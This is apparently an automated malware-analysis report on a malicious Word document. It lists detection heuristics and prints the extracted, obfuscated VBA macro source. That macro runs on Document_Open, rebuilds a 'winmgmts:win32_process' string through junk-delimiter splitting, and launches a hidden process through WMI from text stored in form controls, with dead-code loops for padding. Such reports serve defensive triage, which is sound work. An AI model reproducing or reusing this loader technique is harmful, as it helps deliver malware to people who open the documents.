Verdict: MALICIOUS
Risk Score: 172
Heuristics: 7
- ClamAV: Doc.Downloader.Generic-7542511-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7542511-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: Set Djaskuprkbbs = GetObject(Ntljqgdk)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11648 bytes |

SHA-256: fcd34509b952afc7027a7dc8063e972802622610f7865ee9118ddccdddd416d1

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 221 of 340 identifiers look randomly generated (e.g. 'roc9_msnnj883hn'), consistent with name-mangling obfuscation.

Preview script
First 1,000 lines of the extracted script:
Attribute VB_Name = "Jfmzbhabwk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Fpiozzljznt
End Sub
Attribute VB_Name = "Xfezjsief"
Attribute VB_Base = "0{D9E414C6-B772-43AB-9F9B-D12CC5331B7A}{42BF737A-A082-4436-AC3F-607E3F15FC93}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Kzefggvwq"
Function Pphemutdlf()
Do While Aotwrnyamo = 999
Do While Pqqtozwjrynb = 67 + 344
Ikeunwfb = CLng(Wwhmvpteoexam)
Npdqcbrkq = Int(9116 + 44)
Vsbdmorqwss = CDate(QKoWc)
Bejmhdixooa = 1279 + Int(546)
Kvyflrhh = Chr(4806)
Dlriivtn = Sqr(1512) + Poyrednwq
Loop
Do While Awkewsrg = 33 + 5
Hhcgbpua = 234 + Int(34)
Bebmvxgahdlq = Chr(44)
Cphemdchuchgv = Sqr(55) + Otvombwu
Ylqyxrque = CLng(Ipoysukzeo)
Xtkpcawfviwns = Int(23 + 4)
Wkrlrgsgd = CDate(QKoWc)
Loop
Loop
Nhtemufnlke = ChrW(wdKeyP)
Do While Fkkbhdfw = 999
Do While Ututikdd = 67 + 344
Cqaepdlwsv = CLng(Lvbwgksjnlqbs)
Wchhygabpj = Int(9116 + 44)
Erjdhsuhzr = CDate(QKoWc)
Slwwqzym = 1279 + Int(546)
Ptlnktltmmay = Chr(4806)
Dhjjxskfqdpn = Sqr(1512) + Kpltxkcq
Loop
Do While Hbwfezduxdtj = 33 + 5
Owijciyxihi = 234 + Int(34)
Hadpmqpc = Chr(44)
Earauqgkbawea = Sqr(55) + Njvksowiyvtt
Tzmsadjlh = CLng(Cxhwecabx)
Urehhsteb = Int(23 + 4)
Eiakmzyicbrd = CDate(QKoWc)
Loop
Loop
Iavbeuddw = Nhtemufnlke + Xfezjsief.Vheoebmkjnj + Xfezjsief.Hfrcpeve
Do While Cfsuzxmf = 999
Do While Irbszjpnzmnri = 67 + 344
Zgqhvlxd = CLng(Ujyqexcqkr)
Suietiip = Int(9116 + 44)
Urarvyrkknoge = CDate(QKoWc)
Xvplaxgqxnw = 1279 + Int(546)
Spuybyphpmb = Chr(4806)
Agynmpinvmtdk = Sqr(1512) + Addyzarvspf
Loop
Do While Jhjnibwzsk = 33 + 5
Qcwcbvqya = 234 + Int(34)
Idezjlfxgi = Chr(44)
Odgvjcoi = Sqr(55) + Rixvtruo
Dvakdcnomm = CLng(Sziyvahwmytgl)
Orocsbpa = Int(23 + 4)
Wrhpavgh = CDate(QKoWc)
Loop
Loop
Fack = Xfezjsief.Tjpfeltday.Tag
Uztydwyzrkm = Split(Iavbeuddw + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Grtwtdcyv = 999
Do While Mgtdmrji = 67 + 344
Qunpbwblv = CLng(Levxckhuvak)
Tejtakpkabp = Int(9116 + 44)
Gsgbmaiqa = CDate(QKoWc)
Gkgbovegozvwn = 1279 + Int(546)
Kyclcfavdp = Chr(4806)
Ojxxsckmqdnw = Sqr(1512) + Iigkvsuaqjnpz
Loop
Do While Odmzcpxqb = 33 + 5
Duuhlghfwrot = 234 + Int(34)
Zntokddqgbaa = Chr(44)
Hlsfhapz = Sqr(55) + Xgitxpzkse
Ebrzqmos = CLng(Jfxkyjltga)
Rdvktrcqhs = Int(23 + 4)
Hrnijcknb = CDate(QKoWc)
Loop
Loop
Pphemutdlf = Cywhchmvtrjg + Join(Uztydwyzrkm, "") + Cywhchmvtrjg
Do While Udxyxbvlx = 999
Do While Wszlmdbtskxq = 67 + 344
Mhpxuhxvja = CLng(Lhephodl)
Xwtlzdgv = Int(9116 + 44)
Fmltgndlvb = CDate(QKoWc)
Ckruocdimgjik = 1279 + Int(546)
Ihtoodww = Chr(4806)
Ljtlrqavyuite = Sqr(1512) + Rozzddjo
Loop
Do While Dbmuvgosyctk = 33 + 5
Pinmxvpdelwp = 234 + Int(34)
Vtbvkqnpoacou = Chr(44)
Mkhrejvpx = Sqr(55) + Faxbxgjrxfb
Fhaumjjbowrap = CLng(Mzdefwlnrmcv)
Dbkmhlxj = Int(23 + 4)
Ngmrdfai = CDate(QKoWc)
Loop
Loop
End Function
Function Fpiozzljznt()
wen = "i9_msnnj883hn///9_msnnj883hn///n9_msnnj883hn///9_msnnj883hn///mg9_msnnj883hn///9_msnnj883hn///mt9_msnnj883hn///" + ChrW(wdKeyS) + ":win32_" + Xfezjsief.Sqwerbbgagu + "9_msnnj883hn///roc9_msnnj883hn///9_msnnj883hn///es9_msnnj883hn///9_msnnj883hn///s"
Do While Rxxnboasp = 999
Do While Gxhzmrsezdykk = 67 + 344
Fqyddxuupw = CLng(Ihtxlzgyyl)
Czzfdsmnlqj = Int(9116 + 44)
Mnxldscrejwf = CDate(QKoWc)
Kddmtuiaey = 1279 + Int(546)
Wjhbsyjdzmi = Chr(4806)
Ttyyqczxgcjie = Sqr(1512) + Mljywmwskdr
Loop
Do While Cnxuqqzajbnwp = 33 + 5
Hxsnitrnckq = 234 + Int(34)
Bovzeduteproq = Chr(44)
Kvcgsglm = Sqr(55) + Pclzukag
Ugorlzwcibzse = CLng(Hhjrqpbk)
Bitjeqhnpid = Int(23 + 4)
Vtjiejexxx = CDate(QKoWc)
Loop
Loop
ski = "9_msnnj883hn///"
Do While Uasxbfzv = 999
Do While Huvaxcvk = 67 + 344
Fxbsxoloyccct = CLng(Dkyuxllmcpipz)
Uizpxxzzz = Int(9116 + 44)
Lwqzfaudtsxq = CDate(QKoWc)
Tlycpylhri = 1279 + Int(546)
Ddzekyhd = Chr(4806)
Wdjivwmoxrl = Sqr(1512) + Laxkohde
Loop
Do While Dwqdoiyi = 33 + 5
Fputgcpvcl = 234 + Int(34)
Aanenotwwjo = Chr(44)
Lfsxgyjaq = Sqr(55) + Fddlsicwblwpp
Joopvavmvxwx = CLng(Tqjcrzjkhe)
Syupqdnko = Int(23 + 4)
Acwkriovlf = CDate(QKoWc)
Loop
Loop
Acbmrhdr = Split("9_msnnj883hn///9_msnnj883hn///9_msnnj883hn///w" + wen, ski)
Do While Kgatalgbjx = 999
Do While Ypaeftzbad = 67 + 344
Hydotgdyo = CLng(Xvavduwc)
Ifondhplaihrs = Int(9116 + 44)
Hridtjvd = CDate(QKoWc)
Iexvhdbm = 1279 + Int(546)
Sobqyomnmvfdo = Chr(4806)
Coyiomccjucrq = Sqr(1512) + Gehmjtqsf
Loop
Do While Hqrxfqdzepcew = 33 + 5
Mrvvwvvhpbv = 234 + Int(34)
Cmwtdqelkl = Chr(44)
Oqopdalasg = Sqr(55) + Jibmjcwjosxss
Fiebfgih = CLng(Slakbrwma)
Pscipfyvtvwv = Int(23 + 4)
Roetpbavf = CDate(QKoWc)
Loop
Loop
Ntljqgdk = Join(Acbmrhdr, "")
Do While Phrfpwrelr = 999
Do While Aojwhdvhety = 67 + 344
Iutwozcikd = CLng(Exmxjklam)
Ovmqxlevj = Int(9116 + 44)
Hbyhwsogploqd = CDate(QKoWc)
Kvjmuwmpeb = 1279 + Int(546)
Exfhliiqky = Chr(4806)
Tlffuzejkoa = Sqr(1512) + Wczumufvjk
Loop
Do While Ddhuqyluvt = 33 + 5
Guewsyqwxuo = 234 + Int(34)
Vyevsjawvq = Chr(44)
Oupoordsjnspi = Sqr(55) + Ummipbmuah
Jitkdjzd = CLng(Iidknzhg)
Pzgkjhgvcz = Int(23 + 4)
Potkpcogj = CDate(QKoWc)
Loop
Loop
Set Djaskuprkbbs = GetObject(Ntljqgdk)
Do While Awkrpmqohvdd = 999
Do While Yqqddvmow = 67 + 344
Sducrsdfz = CLng(Oktquagpy)
Gkhblzag = Int(9116 + 44)
Wmwjvmpcaxabp = CDate(QKoWc)
Jmblihpbp = 1279 + Int(546)
Uqhefsqjry = Chr(4806)
Yoqnygdeu = Sqr(1512) + Bmyudshkhllr
Loop
Do While Vrhlgkimfcxs = 33 + 5
Vmtpovfsgxmq = 234 + Int(34)
Qwnwqscovtn = Chr(44)
Phvxlyppus = Sqr(55) + Epdljypz
Jpabapgqabsip = CLng(Zarvyvdrtm)
Dluxwrtxgxkya = Int(23 + 4)
Rtkvzszk = CDate(QKoWc)
Loop
Loop
Pmfxazph = Ntljqgdk + ChrW(wdKeyS) + Xfezjsief.Hyasqpzzhka.ControlTipText$ + Xfezjsief.Catvxnecug.ControlTipText
Do While Ahtlzbitpvio = 999
Do While Gsxhbfuclljck = 67 + 344
Mmawptteluir = CLng(Juhquqtwkify)
Hcxqlyciirwgn = Int(9116 + 44)
Ntnljbqclq = CDate(QKoWc)
Pbrrrvww = 1279 + Int(546)
Rglqampuodgkw = Chr(4806)
Nourzlaewmgq = Sqr(1512) + Krrcqbhzs
Loop
Do While Mqbdvffc = 33 + 5
Hbfjkrbo = 234 + Int(34)
Wppemohgoknw = Chr(44)
Nvybbhbnabc = Sqr(55) + Tfjflohhxb
Gxyopqliswp = CLng(Nwrioobw)
Aeechlfptbk = Int(23 + 4)
Czkkrhtxpq = CDate(QKoWc)
Loop
Loop
Xxgawxijtrfrn = Pmfxazph + Xfezjsief.Sqwerbbgagu
Do While Egwfcbqplyku = 999
Do While Wtlxjpwn = 67 + 344
Icpdmneuqxzdo = CLng(Qxeakdhnysso)
Uwrsxxzl = Int(9116 + 44)
Xupdtcte = CDate(QKoWc)
Ssrncvbor = 1279 + Int(546)
Zbsvbikrbsek = Chr(4806)
Qoduwznb = Sqr(1512) + Ceeqbvkubj
Loop
Do While Xhrujnmonhqk = 33 + 5
Xuumgyejt = 234 + Int(34)
Upfhkire = Chr(44)
Vccpzoivuou = Sqr(55) + Ypzpcannovqo
Gdzyfpqbs = CLng(Hjwnzijqwhrlt)
Jdhgmacib = Int(23 + 4)
Qoocwxgtvqra = CDate(QKoWc)
Loop
Loop
Set Fpiozzljznt = GetObject(Xxgawxijtrfrn)
Do While Xhxuhttsoitbv = 999
Do While Syfmxokw = 67 + 344
Bdgkheko = CLng(Uugkkypgfq)
Ahqgvrahnlmqg = Int(9116 + 44)
Igeimergysv = CDate(QKoWc)
Zeqvycdytbjto = 1279 + Int(546)
Jipdukgzbhsui = Chr(4806)
Napbiiurremo = Sqr(1512) + Upyusxqcr
Loop
Do While Teonghuxbnj = 33 + 5
Broqyzhwrv = 234 + Int(34)
Taqdblihmpdg = Chr(44)
Wsqnqlllsa = Sqr(55) + Erzsbjhvmheua
Wamnhnmd = CLng(Dewghhpub)
Iunuzhzonwn = Int(23 + 4)
Plfnbmrojm = CDate(QKoWc)
Loop
Loop
Fpiozzljznt. _
showwindow = False
Do While Izpulqlq = 999
Do While Tngwpztlzdq = 67 + 344
Oisdffbudwub = CLng(Shjrvxjqc)
Saoadondhaltn = Int(9116 + 44)
Dtqqmulubd = CDate(QKoWc)
Uhjxgiemfm = 1279 + Int(546)
Igywdgov = Chr(4806)
Upalxdhfnw = Sqr(1512) + Swydfkit
Loop
Do While Zpifworupva = 33 + 5
Twulbfzzxof = 234 + Int(34)
Yabdmrfd = Chr(44)
Drgtoshrci = Sqr(55) + Glzhogqcb
Uprtmiiejclq = CLng(Mkgpwcftttpd)
Zmojazmd = Int(23 + 4)
Vitezcvvfmcvk = CDate(QKoWc)
Loop
Loop
Do While Djaskuprkbbs.Create(pok & Pphemutdlf, Osiocebbkbpo, Fpiozzljznt, Cptfqqwyeav)
Loop
Do While Ngwzjojcfda = 999
Do While Vjaibwpd = 67 + 344
Urjixkpauuww = CLng(Vcigeqwm)
Mkajcizke = Int(9116 + 44)
Hzfmrqdg = CDate(QKoWc)
Ylwmyojys = 1279 + Int(546)
Sdwmkfxlu = Chr(4806)
Lbnccunatggb = Sqr(1512) + Dwetpmlovowjz
Loop
Do While Fuxsfzvzvm = 33 + 5
Sebmciogjt = 234 + Int(34)
Ahxgygtuf = Chr(44)
Liiiyixihaa = Sqr(55) + Tctblbblct
Cpaosufdrpeta = CLng(Mkkezpnmwmrje)
Jpqkwswu = Int(23 + 4)
Vpsexabvc = CDate(QKoWc)
Loop
Loop
End Function